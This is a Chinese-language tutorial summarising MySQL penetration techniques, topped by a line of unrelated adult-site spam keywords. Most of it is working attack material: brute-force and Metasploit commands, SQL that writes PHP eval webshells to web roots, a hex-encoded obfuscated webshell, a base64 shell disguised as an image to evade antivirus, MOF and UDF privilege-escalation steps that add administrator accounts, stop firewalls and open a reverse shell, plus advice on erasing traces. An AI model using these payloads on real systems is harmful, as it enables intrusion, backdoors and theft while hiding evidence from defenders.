精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

MySQL數(shù)據(jù)庫(kù)滲透及漏洞利用總結(jié)

數(shù)據(jù)庫(kù) MySQL 大數(shù)據(jù)
目前很多架構(gòu)都以Mysql作為數(shù)據(jù)庫(kù)管理系統(tǒng),例如LAMP、和WAMP等,在針對(duì)網(wǎng)站滲透中,很多都是跟Mysql數(shù)據(jù)庫(kù)有關(guān),各種Mysql注入,Mysql提權(quán),Mysql數(shù)據(jù)庫(kù)root賬號(hào)webshell獲取等的,但沒(méi)有一個(gè)對(duì)Mysql數(shù)據(jù)庫(kù)滲透較為全面對(duì)總結(jié),針對(duì)這種情況我們開(kāi)展了研究。

[[209092]]

Mysql數(shù)據(jù)庫(kù)是目前世界上使用最為廣泛的數(shù)據(jù)庫(kù)之一,很多著名公司和站點(diǎn)都使用Mysql作為其數(shù)據(jù)庫(kù)支撐,目前很多架構(gòu)都以Mysql作為數(shù)據(jù)庫(kù)管理系統(tǒng),例如LAMP、和WAMP等,在針對(duì)網(wǎng)站滲透中,很多都是跟Mysql數(shù)據(jù)庫(kù)有關(guān),各種Mysql注入,Mysql提權(quán),Mysql數(shù)據(jù)庫(kù)root賬號(hào)webshell獲取等的,但沒(méi)有一個(gè)對(duì)Mysql數(shù)據(jù)庫(kù)滲透較為全面對(duì)總結(jié),針對(duì)這種情況我們開(kāi)展了研究,雖然我們團(tuán)隊(duì)今年正在出版《網(wǎng)絡(luò)攻防實(shí)戰(zhàn)研究——漏洞利用與提權(quán)》,但技術(shù)的進(jìn)步有無(wú)止境,思想有多遠(yuǎn),路就可以走多遠(yuǎn),在研究mysql數(shù)據(jù)庫(kù)安全之余,對(duì)Mysql如何通過(guò)msf、sqlmap等來(lái)進(jìn)行掃描、漏洞利用、提權(quán)、Mysql密碼破解和獲取webshell等進(jìn)行了詳細(xì)研究。

1.1 Mysql信息收集

1.端口信息收集

Mysql默認(rèn)端口是3306端口,但也有自定義端口,針對(duì)默認(rèn)端口掃描主要利用掃描軟件進(jìn)行探測(cè),推薦使用:

  • iisputter,直接填寫(xiě)3306端口,IP地址填寫(xiě)單個(gè)或者C段地址。
  • nmap掃描nmap -p 3306 192.168.1.1-254

特定目標(biāo)的滲透,可能需要對(duì)全端口進(jìn)行掃描,可以使用Nmap對(duì)某一個(gè)IP地址進(jìn)行全端口掃描,端口掃描軟件還有sfind等DOS下掃描的工具。

2.版本信息收集

(1)msf查看版本信息auxiliary/scanner/mysql/mysql_version模塊,以掃描主機(jī)192.168.157.130為例,命令為:

  1. use auxiliary/scanner/mysql/mysql_version 
  2.  
  3. set rhosts 192.168.157.130 
  4.  
  5. run  

(2)mysql查詢版本命令:

  1. SELECT @@version`、`SELECT version(); 

(3)sqlmap通過(guò)注入點(diǎn)掃描確認(rèn)信息:

  1. sqlmap.py -u url --dbms mysql 

(4)phpmyadmin管理頁(yè)面登錄后查看localhost->變量->服務(wù)器變量和設(shè)置中的version參數(shù)值。

3.數(shù)據(jù)庫(kù)管理信息收集

Mysql管理工具有多種,例如phpmyadmin網(wǎng)站管理,Navicat for MySQL以及MysqlFront等客戶端工具。這些工具有的會(huì)直接保存配置信息,這些信息包含數(shù)據(jù)庫(kù)服務(wù)器地址和數(shù)據(jù)庫(kù)用戶名以及密碼,通過(guò)嗅探或者破解配置文件可以獲取密碼等信息。

4.msf信息收集模塊

(1)mysql哈希值枚舉

  1. use auxiliary/scanner/mysql/mysql_hashdump 
  2.  
  3. set username root 
  4.  
  5. set password root 
  6.  
  7. run  

(2)獲取相關(guān)信息

  1. use auxiliary/admin/mysql/mysql_enum 
  2.  
  3. set username root 
  4.  
  5. set password root 
  6.  
  7. run  

獲取數(shù)據(jù)庫(kù)版本,操作系統(tǒng)名稱,架構(gòu),數(shù)據(jù)庫(kù)目錄,數(shù)據(jù)庫(kù)用戶以及密碼哈希值。

(3)執(zhí)行mysql語(yǔ)句,連接成功后可以在msf執(zhí)行sql語(yǔ)句,跟sqlmap的–sql-shell模塊類(lèi)似。

  1. use auxiliary/admin/mysql/mysql_sql 

(4)將mysql_schem導(dǎo)出到本地 /root/.msf4/loot/文件夾下

  1. use auxiliary/scanner/mysql/mysql_schemadump 

(5)文件枚舉和目錄可寫(xiě)信息枚舉

  1. auxiliary/scanner/mysql/mysql_file_enum 
  2.  
  3. auxiliary/scanner/mysql/mysql_writable_dirs  

沒(méi)有測(cè)試成功過(guò),需要定義枚舉目錄和相關(guān)文件,覺(jué)得基本沒(méi)有啥用。

1.2Mysql密碼獲取

1.2.1暴力破解

Mysql暴力破解主要有幾種:

1.網(wǎng)頁(yè)在線連接破解

可以使用burpsuite和phpMyAdmin多線程批量破解工具。 下載:https://portswigger.net/burp/、http://pan.baidu.com/s/1c1LD6co

2.msf通過(guò)命令行進(jìn)行暴力破解

msf破解mysql密碼模塊auxiliary/scanner/mysql/mysql_login,其參數(shù)主要有BLANK_PASSWORDS、BRUTEFORCE_SPEED、DB_ALL_CREDS、DB_ALL_PASS、DB_ALL_USERS、PASSWORD、PASS_FILE、Proxies、RHOSTS、RPORT、STOP_ON_SUCCESS、THREADS、USERNAME、USERPASS_FILE、USER_AS_PASS、USER_FILE、VERBOSE參數(shù)。對(duì)單一主機(jī)僅僅需要設(shè)置RHOSTS、RPORT、USERNAME、PASSWORD和PASS_FILE,其它參數(shù)根據(jù)實(shí)際情況進(jìn)行設(shè)置。

(1)場(chǎng)景A:對(duì)內(nèi)網(wǎng)獲取root某一個(gè)口令后,擴(kuò)展?jié)B透

  1. use auxiliary/scanner/mysql/mysql_login 
  2.  
  3. set RHOSTS 192.168.157.1-254 
  4.  
  5. set password root 
  6.  
  7. set username root 
  8.  
  9. run  

執(zhí)行后對(duì)192.168.157.1-254進(jìn)行mysql密碼掃描驗(yàn)證。

(2)場(chǎng)景B:使用密碼字典進(jìn)行掃描

  1. use auxiliary/scanner/mysql/mysql_login 
  2.  
  3. set RHOSTS 192.168.157.1-254 
  4.  
  5. set pass_file /tmp/password.txt 
  6.  
  7. set username root 
  8.  
  9. run  

3.使用nmap掃描并破解密碼

(1)對(duì)某一個(gè)IP或者IP地址段進(jìn)行nmap默認(rèn)密碼暴力破解并掃描

  1. nmap --script=mysql-brute 192.168.157.130 
  2.  
  3. nmap --script=mysql-brute 192.168.157.1-254  

(2)使用root賬號(hào)root密碼進(jìn)行mysql密碼驗(yàn)證并掃描獲取指定IP地址的端口信息以及mysql數(shù)據(jù)庫(kù)相關(guān)信息

  1. nmap -sV --script=mysql-databases --script-argsmysqluser=root,mysqlpass=root 192.168.157.130 

(3)檢查root空口令

  1. nmap --script mysql-empty-password 192.168.195.130 

4.使用hscan工具對(duì)mysql口令進(jìn)行掃描,需要設(shè)置掃描IP地址段以及數(shù)據(jù)庫(kù)口令字典及用戶名字典。

1.2.2源代碼泄露

1.網(wǎng)站源代碼備份文件

一些網(wǎng)站源代碼文件中會(huì)包含數(shù)據(jù)庫(kù)連接文件,通過(guò)查看這些文件可以獲取數(shù)據(jù)庫(kù)賬號(hào)和密碼。一般常見(jiàn)的數(shù)據(jù)庫(kù)連接文件為config.php、web.config、conn.asp、db.php/asp、jdbc.properties、sysconfig.properties、JBOSS_HOME\docs\examples\jca\XXXX-ds.xml。以前有一款工具挖掘雞可以自定義網(wǎng)站等名稱對(duì)zip/rar/tar/tar.gz/gz/sql等后綴文件進(jìn)行掃描。

2.配置備份文件

使用ultraedit等編輯文件編輯數(shù)據(jù)庫(kù)配置文件后,會(huì)留下bak文件。

1.2.3文件包含

本地文件包含漏洞可以包含文件,通過(guò)查看文件代碼獲取數(shù)據(jù)庫(kù)配置文件,進(jìn)而讀取數(shù)據(jù)庫(kù)用戶名和密碼。

1.2.4其它情況

有些軟件會(huì)將IP地址、數(shù)據(jù)庫(kù)用戶名和密碼寫(xiě)進(jìn)程序中,運(yùn)行程序后,通過(guò)cain軟件進(jìn)行嗅探,可以獲取數(shù)據(jù)庫(kù)密碼。另外Mysql客戶端管理工具有的管理員會(huì)建立連接記錄,這些連接記錄保存了用戶名、密碼和連接IP地址或者主機(jī)名,通過(guò)配置文件或者嗅探可以獲取用戶名和密碼。

1.3Mysql獲取webshell

1.3.1phpmyadminroot賬號(hào)獲取webshell

MysqlRoot賬號(hào)通過(guò)phpMyAdmin獲取webshell的思路,主要有下面幾種方式,以第一二六八種方法較佳,其它可以根據(jù)實(shí)際情況來(lái)進(jìn)行。

1.直接讀取后門(mén)文件

通過(guò)程序報(bào)錯(cuò)、phpinfo函數(shù)、程序配置表等直接獲取網(wǎng)站真實(shí)路徑,有些網(wǎng)站前期已經(jīng)被人滲透過(guò),因此在目錄下留有后門(mén)文件通過(guò)load_file直接讀取。

2.直接導(dǎo)出一句話后門(mén)

前提需要知道網(wǎng)站的真實(shí)物理路徑,例如呼求偶真實(shí)路徑D:\work\WWW,則可以通過(guò)執(zhí)行以下查詢,來(lái)獲取一句話后門(mén)文件cmd.php,訪問(wèn)地址http://www.somesite.com/cmd.php

  1. select '<?php @eval($_POST[antian365]);?>'INTO OUTFILE 'D:/work/WWW/antian365.php' 

3.創(chuàng)建數(shù)據(jù)庫(kù)導(dǎo)出一句話后門(mén)

在查詢窗口直接執(zhí)行以下代碼即可,跟2.原理類(lèi)似。

  1. CREATE TABLE `mysql`.`antian365` (`temp` TEXT NOTNULL ); 
  2.  
  3. INSERT INTO `mysql`.`antian365` (`temp` ) VALUES('<?php @eval($_POST[antian365]);?>'); 
  4.  
  5. SELECT `tempFROM `antian365` INTO OUTFILE'D:/www/antian365.php'
  6.  
  7. DROP TABLE IF EXISTS `antian365`;  

4.可執(zhí)行命令方式

​ 創(chuàng)建執(zhí)行命令形式的shell,但前提是對(duì)方未關(guān)閉系統(tǒng)函數(shù)。該方法導(dǎo)出成功后可以直接執(zhí)行DOS命令,使用方法:www.xxx.com/antian365.php?cmd=(cmd=后面直接執(zhí)行dos命令)。

  1. select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/antian365.php' 

另外在linux下可以導(dǎo)出直接執(zhí)行命令的shell:

  1. SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'

http://localhost/shell.php?c=cat%20/etc/passwd

5.過(guò)殺毒軟件方式

通過(guò)后臺(tái)或者存在上傳圖片的地方,上傳圖片publicguide.jpg,內(nèi)容如下:

  1. <?php$a=' PD9waHAgQGV2YWwoJF9QT1NUWydhbnRpYW4zNjUnXSk7ZGllKCk7Pz4=';error_reporting(0);@set_time_limit(0);eval("?>".base64_decode($a));?> 

然后通過(guò)圖片包含temp.php,導(dǎo)出webshell。

  1. select '<?php include 'publicguide.jpg' ?>'INTO OUTFILE 'D:/work/WWW/antian365.php' 

一句話后門(mén)密碼:antian365

6.直接導(dǎo)出加密webshell

一句話后門(mén)文件密碼:pp64mqa2x1rnw68,執(zhí)行以下查詢直接導(dǎo)出加密webshell,D:/WEB/IPTEST/22.php,注意在實(shí)際過(guò)程需要修改D:/WEB/IPTEST/22.php。

  1. select unhex('203C3F7068700D0A24784E203D2024784E2E737562737472282269796234327374725F72656C6750383034222C352C36293B0D0A246C766367203D207374725F73706C697428226D756B3961773238776C746371222C36293B0D0A24784E203D2024784E2E73756273747228226C396364706C616365704172424539646B222C342C35293B0D0A246A6C203D2073747269706F732822657078776B6C3766363674666B74222C226A6C22293B0D0A2474203D2024742E737562737472282274514756325957774A63567534222C312C36293B0D0A2465696137203D207472696D28226A386C32776D6C34367265656E22293B0D0A2462203D2024622E73756273747228226B6261736536346B424474394C366E6D222C312C36293B0D0A246967203D207472696D28226233397730676E756C6922293B0D0A2479203D2024792E24784E28227259222C22222C22637259726572596122293B0D0A24797531203D207374725F73706C697428226269316238376D3861306F3678222C32293B0D0A2474203D2024742E24784E282278413678222C22222C2277784136786F4A463922293B0D0A246E64203D2073747269706F7328226E363574383872786E303265646A336630222C226E6422293B0D0A2462203D2024622E24784E282277493339222C22222C225F774933396477493339656322293B0D0A2468387073203D207374725F73706C697428226B6E396A3968346D6877676633666A6970222C33293B0D0A2479203D2024792E7375627374722822687974655F66756E775669535645344A222C322C36293B0D0A24796637203D207374726C656E282275656875343967367467356B6F22293B0D0A2474203D2024742E24784E28226670222C22222C22516670546670314E667022293B0D0A246D39203D207374726C656E282265756C363034636F626B22293B0D0A2462203D2024622E73756273747228226C3057316F64656C413165536E454A222C342C33293B0D0A2468306277203D207472696D28226E33653568306371746F6B76676F6238747822293B0D0A2479203D2024792E24784E28227962222C22222C2263796274696F22293B0D0A24733761203D20727472696D2822617565627963396734743564386B22293B0D0A2474203D2024742E7375627374722822624D73306E4268383355577964222C392C34293B0D0A2464353971203D2073747269706F732822636A7675636B6F79357766336F746561222C226435397122293B0D0A2479203D2024792E73756273747228226E4439487851534C386E6752222C392C31293B0D0A246C31203D207374725F73706C697428226167717130396762716E31222C34293B0D0A2474203D2024742E24784E282277366F34222C22222C2277634477366F345977366F343022293B0D0A247079203D2073747269706F7328226C677938687472727631746333222C22707922293B0D0A2474203D2024742E24784E282265503332222C22222C22625846655033326822293B0D0A2478703364203D2073747269706F732822756B6C306E626E7839677433222C227870336422293B0D0A2474203D2024742E7375627374722822696B4A3030484A4D6E677863222C372C35293B0D0A2464743262203D207374726C656E282265346135616275616A7733766C6369726122293B0D0A2474203D2024742E737562737472282263644E314B78656D35334E776D456838364253222C372C34293B0D0A2475626A203D207374726C656E28227767686A6E6674326F70356B7831633038367422293B0D0A2474203D2024742E73756273747228226D34616F7864756A676E58536B63784C344657635964222C372C36293B0D0A247178203D207374726C656E2822726C71666B6B6674726F3867666B6F37796122293B0D0A2474203D2024742E7375627374722822723779222C312C31293B0D0A246D75203D20727472696D28226E676478777578357671653122293B0D0A246A203D2024792822222C20246228247429293B0D0A24626E6C70203D207374726C656E28227675667930616B316679617622293B0D0A24736468203D207374725F73706C69742822776D6E6A766733633770306D222C34293B0D0A246D62203D206C7472696D28226E353270317067616570656F6B6622293B0D0A2465307077203D20727472696D28227575346D686770356339706E613465677122293B0D0A24756768203D207472696D282272637064336F3977393974696F3922293B0D0A246772636B203D207374726C656E2822783572697835627031786B793722293B0D0A24656F3674203D207374726C656E282264646931683134656375797563376422293B246A28293B0D0A2464766E71203D207374725F73706C6974282270726D36676968613176726F333630346175222C38293B0D0A24756738203D20727472696D28226563387735327375706234767538656F22293B0D0A24726374203D2073747269706F73282268786536776F37657764386D65376474222C2272637422293B0D0A24656B7166203D207374725F73706C69742822707266357930386538666C6666773032356A38222C38293B0D0A24767972203D207374725F73706C69742822756D706A63737266673668356E64366F3435222C39293B0D0A24777266203D20727472696D282266797839396F3739333868377567716822293B0D0A24713134203D207374726C656E2822746334366F73786C3173743169633222293B0D0A66756E6374696F6E206F2820297B2020207D3B0D0A24757366203D207374726C656E2822666C7463707862377466626A736D7422293B0D0A3F3E'into dumpfile 'D:/WEB/IPTEST/22.php' 

注意:

也可以使用http://tool.lu/hexstr/網(wǎng)站的代碼轉(zhuǎn)換來(lái)實(shí)現(xiàn),將需要導(dǎo)出的文件代碼復(fù)制到網(wǎng)站的字符串中,通過(guò)字符串轉(zhuǎn)成十六進(jìn)制,將十六進(jìn)制字符串放入unhex函數(shù)進(jìn)行查詢即可:

  1. select unhex('十六進(jìn)制字符串'into dumpfile 'D:/WEB/shell.php' 

7.CMS系統(tǒng)獲取webshell

有些情況下無(wú)法獲取網(wǎng)站的真實(shí)路徑,則意味著無(wú)法直接導(dǎo)出一句話webshell,可以通過(guò)CMS系統(tǒng)管理賬號(hào)登錄系統(tǒng)后,尋找漏洞來(lái)突破,例如dedecms則可以通過(guò)破解管理員賬號(hào)后直接上傳文件來(lái)獲取webshell。Discuz!的UC_key可以直接獲取webshell。甚至某些系統(tǒng)可以直接上傳php文件。下面是一些CMS系統(tǒng)滲透的技巧:

dedecms系統(tǒng)的密碼有直接md5,也有20位的密碼,如果是20位的密碼則需要去掉密碼中的前3位和最后1位,然后對(duì)剩余的值進(jìn)行md5解密即可;

phpcms v9版本的密碼需要加salt進(jìn)行破解,需要選擇破解算法md5(md5($pass).$salt)進(jìn)行破解。

Discuz!論壇帳號(hào)保存在ucenter_members(Discuz7.X及以上版本)或者cdb_members(discuz6.x版本)表中,其破解需要帶salt進(jìn)行,其破解時(shí)是使用password:salt進(jìn)行,例如a0513df9929afc972f024fa4e586e829:399793。

8.general_log_file獲取webshell

(1)查看genera文件配置情況

  1. show global variables like "%genera%"

(2)關(guān)閉general_log

  1. set global general_log=off

(3)通過(guò)general_log選項(xiàng)來(lái)獲取webshell

  1. set global general_log='on'
  2.  
  3. SET global general_log_file='D:/phpStudy/WWW/cmd.php' 

在查詢中執(zhí)行語(yǔ)句:

  1. SELECT '<?php assert($_POST["cmd"]);?>'

Shell為cmd.php,一句話后門(mén),密碼為cmd。

1.3.2sqlmap注入點(diǎn)獲取webshell

sqlmap注入點(diǎn)獲取webshell的前提是具備寫(xiě)權(quán)限,一般是root賬號(hào),通過(guò)執(zhí)行命令來(lái)獲取:

  1. sqlmap -u url--os-shell 
  2.  
  3. echo "<?php @eval($_POST['c']);?>" >/data/www/1.php  

1.4Mysql提權(quán)

1.4.1mof提權(quán)

1.Webshell上傳mof文件提權(quán)

MySQL Root權(quán)限MOF方法提權(quán)是來(lái)自國(guó)外Kingcope大牛發(fā)布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),簡(jiǎn)稱mysql遠(yuǎn)程提權(quán)0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理規(guī)范 (WMI) 提供了以下三種方法編譯到 WMI 存儲(chǔ)庫(kù)的托管對(duì)象格式 (MOF) 文件:

方法1:運(yùn)行 MOF 文件指定為命令行參數(shù) Mofcomp.exe 文件。

方法2:使用 IMofCompiler 接口和 $ CompileFile 方法。

方法3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夾的 MOF 文件。

Microsoft 建議您到存儲(chǔ)庫(kù)編譯 MOF 文件使用前兩種方法。也就是運(yùn)行 Mofcomp.exe 文件,或使用IMofCompiler::CompileFile方法。第三種方法僅為向后兼容性與早期版本的 WMI提供,并因?yàn)榇斯δ芸赡懿粫?huì)提供在將來(lái)的版本后,不應(yīng)使用。注意使用MOF方法提權(quán)的前提是當(dāng)前Root帳號(hào)可以復(fù)制文件到%SystemRoot%\System32\Wbem\MOF目錄下,否則會(huì)失敗!

該漏洞的利用前提條件是必須具備mysql的root權(quán)限,在Kingcope公布的0day中公布了一個(gè)pl利用腳本。

  1. perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555 

192.168.2.100為mysql數(shù)據(jù)庫(kù)所在服務(wù)器,mysql口令為空,反彈到192.168.2.150的5555端口上。

2.生成nullevt.mof文件

將以下代碼保存為nullevt.mof文件:

  1. #pragma namespace("\\\\.\\root\\subscription")  
  2.  
  3. instance of __EventFilter as $EventFilter 
  4.  
  5. {  
  6.  
  7. EventNamespace = "Root\\Cimv2";  
  8.  
  9. Name  = "filtP2";  
  10.  
  11.     Query = "Select \ From __InstanceModificationEvent "  
  12.  
  13.             "Where TargetInstance Isa \"Win32_LocalTime\" "  
  14.  
  15.             "And TargetInstance.Second = 5";  
  16.  
  17. QueryLanguage = "WQL";  
  18.  
  19. };  
  20.  
  21.  
  22.  
  23. instance of ActiveScriptEventConsumer as $Consumer  
  24.  
  25. {  
  26.  
  27.     Name = "consPCSV2";  
  28.  
  29. ScriptingEngine = "JScript";  
  30.  
  31. ScriptText =  
  32.  
  33.     "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";  
  34.  
  35. };  
  36.  
  37. instance of __FilterToConsumerBinding 
  38.  
  39. {  
  40.  
  41.     Consumer   = $Consumer;  
  42.  
  43.     Filter = $EventFilter;  
  44.  
  45. };  

3.通過(guò)Mysql查詢將文件導(dǎo)入

執(zhí)行以下查詢語(yǔ)句,將上面生成的nullevt.mof導(dǎo)入到c:\windows\system32\wbem\mof\目錄下在windows7中默認(rèn)是拒絕訪問(wèn)的。導(dǎo)入后系統(tǒng)會(huì)自動(dòng)運(yùn)行,執(zhí)行命令。

  1. selectload_file('C:\\RECYCLER\\nullevt.mof'into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

1.4.2.Msf直接mof提權(quán)

Msf下的exploit/windows/mysql/mysql_mof模塊提供了直接Mof提權(quán),不過(guò)該漏洞成功跟操作系統(tǒng)權(quán)限和Mysql數(shù)據(jù)庫(kù)版本有關(guān),執(zhí)行成功后會(huì)直接反彈shell到meterpreter。

  1. use exploit/windows/mysql/mysql_mof 
  2. set rhost 192.168.157.1 //設(shè)置需要提權(quán)的遠(yuǎn)程主機(jī)IP地址 
  3. set rport 3306 //設(shè)置mysql的遠(yuǎn)程端口 
  4. set password root //設(shè)置mysql數(shù)據(jù)庫(kù)root密碼 
  5. set username root //設(shè)置mysql用戶名 
  6. options //查看設(shè)置 
  7. run 0  

技巧:

要是能夠通過(guò)網(wǎng)頁(yè)連接管理(phpmyadmin),則可以修改host為%并刷新權(quán)限后,則可以通過(guò)msf等工具遠(yuǎn)程連接數(shù)據(jù)庫(kù)。默認(rèn)root等賬號(hào)不允許遠(yuǎn)程連接,除非管理員或者數(shù)據(jù)庫(kù)用戶自己設(shè)置。

方法1:本地登入mysql,更改 mysql數(shù)據(jù)庫(kù)里的 user 表里的 host項(xiàng),將localhost改為%

  1. use mysql; 
  2. update user set host = '%' where user = 'root'
  3. FLUSH PRIVILEGES ; 
  4. select host, user from user 

方法2:直接授權(quán)(推薦)

從任何主機(jī)上使用root用戶,密碼:youpassword(你的root密碼)連接到mysql服務(wù)器:

  1. # mysql -u root -proot 
  2. GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION
  3. FLUSH PRIVILEGES 

推薦重新增加一個(gè)用戶,在實(shí)際測(cè)試過(guò)程中發(fā)現(xiàn)很多服務(wù)器使用root配置了多個(gè)地址,修改后可能會(huì)影響實(shí)際系統(tǒng)的運(yùn)行。在實(shí)際測(cè)試過(guò)程中因此建議新增一個(gè)用戶,授權(quán)所有權(quán)限,而不是直接更改root配置。

1.4.3UDF提權(quán)

UDF提權(quán)是利用MYSQL的自定義函數(shù)功能,將MYSQL賬號(hào)轉(zhuǎn)化為系統(tǒng)system權(quán)限,其利用條件是目標(biāo)系統(tǒng)是Windows(Win2000,XP,Win2003);擁有MYSQL的某個(gè)用戶賬號(hào),此賬號(hào)必須有對(duì)mysql的insert和delete權(quán)限以創(chuàng)建和拋棄函數(shù),有root賬號(hào)密碼

Windows下UDF提權(quán)對(duì)于Windows2008以下服務(wù)器比較適用,也即針對(duì)Windows2000、Windows2003的成功率較高。

1.UDF提權(quán)條件

Mysql版本大于5.1版本udf.dll文件必須放置于MYSQL安裝目錄下的lib\plugin文件夾下。

Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。

掌握的mysql數(shù)據(jù)庫(kù)的賬號(hào)有對(duì)mysql的insert和delete權(quán)限以創(chuàng)建和拋棄函數(shù),一般以root賬號(hào)為佳,具備`root賬號(hào)所具備的權(quán)限的其它賬號(hào)也可以。

可以將udf.dll寫(xiě)入到相應(yīng)目錄的權(quán)限。

2.提權(quán)方法

(1)獲取數(shù)據(jù)庫(kù)版本、數(shù)據(jù)位置以及插件位置等信息

  1. select version();//獲取數(shù)據(jù)庫(kù)版本 
  2. select user();//獲取數(shù)據(jù)庫(kù)用戶 
  3. select @@basedir ;//獲取安裝目錄 
  4. show variables like '%plugins%';  //尋找mysql安裝路徑  

(2)導(dǎo)出路徑

  1. C:\Winnt\udf.dll    Windows 2000 
  2. C:\Windows\udf.dll   Windows2003(有的系統(tǒng)被轉(zhuǎn)義,需要改為C:Windowsudf.dll)  

MYSQL 5.1以上版本,必須要把udf.dll文件放到MYSQL安裝目錄下的libplugin文件夾下才能創(chuàng)建自定義函數(shù)。該目錄默認(rèn)是不存在的,這就需要我們使用webshell找到MYSQL的安裝目錄,并在安裝目錄下創(chuàng)建libplugin文件夾,然后將udf.dll文件導(dǎo)出到該目錄即可。

在某些情況下,我們會(huì)遇到Can’t open shared library的情況,這時(shí)就需要我們把udf.dll導(dǎo)出到lib\plugin目錄下才可以,網(wǎng)上大牛發(fā)現(xiàn)利用NTFS ADS流來(lái)創(chuàng)建文件夾的方法:

  1. select @@basedir;  //查找到mysql的目錄 
  2. select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';   //利用NTFS ADS創(chuàng)建lib目錄 
  3. select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS創(chuàng)建plugin目錄  

執(zhí)行成功以后就會(huì)plugin目錄,然后再進(jìn)行導(dǎo)出udf.dll即可。

(3)創(chuàng)建cmdshell 函數(shù),該函數(shù)叫什么名字在后續(xù)中則使用該函數(shù)進(jìn)行查詢:

  1. create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’; 

(4)執(zhí)行命令:

  1. select sys_eval(‘whoami’); 

一般情況下不會(huì)出現(xiàn)創(chuàng)建不成功哦。

連不上3389可以先停止windows防火墻和篩選

  1. select sys_eval(‘net stop policyagent’); 
  2. select sys_eval(‘net stop sharedaccess’);  

udf.dll下常見(jiàn)函數(shù):

cmdshell 執(zhí)行cmd;

downloader 下載者,到網(wǎng)上下載指定文件并保存到指定目錄;

open3389 通用開(kāi)3389終端服務(wù),可指定端口(不改端口無(wú)需重啟);

backshell 反彈Shell;

ProcessView 枚舉系統(tǒng)進(jìn)程;

KillProcess 終止指定進(jìn)程;

regread 讀注冊(cè)表;

regwrite 寫(xiě)注冊(cè)表;

shut 關(guān)機(jī),注銷(xiāo),重啟;

about 說(shuō)明與幫助函數(shù);

具體用戶示例:

  1. select cmdshell('net user iis_user 123!@#abcABC /add'); 
  2. select cmdshell('net localgroup administrators iis_user /add'); 
  3. select cmdshell('regedit /s d:web3389.reg'); 
  4. select cmdshell('netstat -an');  

(5)清除痕跡

  1. drop function cmdshell;//將函數(shù)刪除 

刪除udf.dll文件以及其它相關(guān)入侵文件及日志。

(6)常見(jiàn)錯(cuò)誤

  1. 1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement 

在my.ini或者mysql.cnf文件中注銷(xiāo) (使用#號(hào)) 包含secure_file_priv的行(SHOW VARIABLES LIKE “secure_file_priv”)。

  1. 1123 - Can't initialize function 'backshell'; UDFs are unavailable with the --skip-grant-tables option 

需要將my.ini中的skip-grant-tables選項(xiàng)去掉。

3.webshell下udf提權(quán)

通過(guò)集成udf提權(quán)的webshell輸入數(shù)據(jù)庫(kù)用戶名及密碼以及數(shù)據(jù)庫(kù)服務(wù)器地址或者IP通過(guò)連接后導(dǎo)出進(jìn)行提權(quán)。

4.Mysql提權(quán)綜合利用工具

v5est0r 寫(xiě)了一個(gè)Mysql提權(quán)綜合利用工具,詳細(xì)情況請(qǐng)參考其代碼共享網(wǎng)站:https://github.com/v5est0r/Python_FuckMySQL其主要功能有:

(1)自動(dòng)導(dǎo)出你的backdoor和mof文件

(2)自動(dòng)判斷mysql版本,根據(jù)版本不同導(dǎo)出UDF的DLL到不同目錄,UDF提權(quán)

(3)導(dǎo)出LPK.dll文件,劫持系統(tǒng)目錄提權(quán)

(4)寫(xiě)啟動(dòng)項(xiàng)提權(quán)

UdF自動(dòng)提權(quán):

  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m udf 

LPK劫持提權(quán):

  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m lpk 

啟動(dòng)項(xiàng)提權(quán):

  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" –mst 

例如通過(guò)LOAD_FILE來(lái)查看Mysql配置文件my.ini,如果其中配置了skip-grant-tables,這無(wú)法進(jìn)行提權(quán)

1.6.3無(wú)法獲取webshell提權(quán)

1.連接mysql

(1)mysql.exe -h ip -uroot -p

(2)phpmyadmin

(3)Navicat for MySQL

2.查看數(shù)據(jù)庫(kù)版本和數(shù)據(jù)路徑

  1. SELECT VERSION( ); 
  2.  
  3. Select @@datadir;  

5.1以下版本,將dll導(dǎo)入到c:/windows或者c:/windows/system32/

5.1以上版本 通過(guò)以下查詢來(lái)獲取插件路徑:

  1. SHOW VARIABLES WHERE Variable_Name LIKE "%dir"
  2.  
  3. show variables like '%plugin%' ; 
  4.  
  5. select load_file('C:/phpStudy/Apache/conf/httpd.conf'
  6.  
  7. select load_file('C:/phpStudy/Apache/conf/vhosts.conf'
  8.  
  9. select load_file('C:/phpStudy/Apache/conf/extra/vhosts.conf'
  10.  
  11. select load_file('C:/phpStudy/Apache/conf/extra/httpd.conf'
  12.  
  13. select load_file('d:/phpStudy/Apache/conf/vhosts.conf' 

3.修改mysql.txt

Mysql.txt為udf.dll的二進(jìn)制文件轉(zhuǎn)成十六進(jìn)制代碼。

(1)先執(zhí)行導(dǎo)入ghost表中的內(nèi)容

修改以下代碼的末尾代碼 select backshell(“YourIP”,4444);

(2)導(dǎo)出文件到某個(gè)目錄

  1. select data from Ghost into dumpfile 'c:/windows/mysqldll.dll'
  2.  
  3. select data from Ghost into dumpfile 'c:/windows/system32/mysqldll'
  4.  
  5. select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll'
  6.  
